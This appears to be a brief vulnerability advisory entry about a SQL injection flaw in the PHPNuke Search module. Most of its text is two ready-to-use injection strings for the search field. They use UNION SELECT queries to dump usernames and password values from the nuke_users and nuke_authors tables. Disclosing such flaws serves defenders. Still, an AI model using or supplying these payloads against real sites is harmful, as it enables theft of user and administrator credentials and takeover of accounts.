|
PHPNuke Search Module SQL Injection Vulnerability
No exploit is required. The following proof-of-concept search-field data is available: s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* -> users passwords and logins s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/* -> nuke_authors passwords and logins Proof-of-concept examples are available: |
|
Privacy Statement |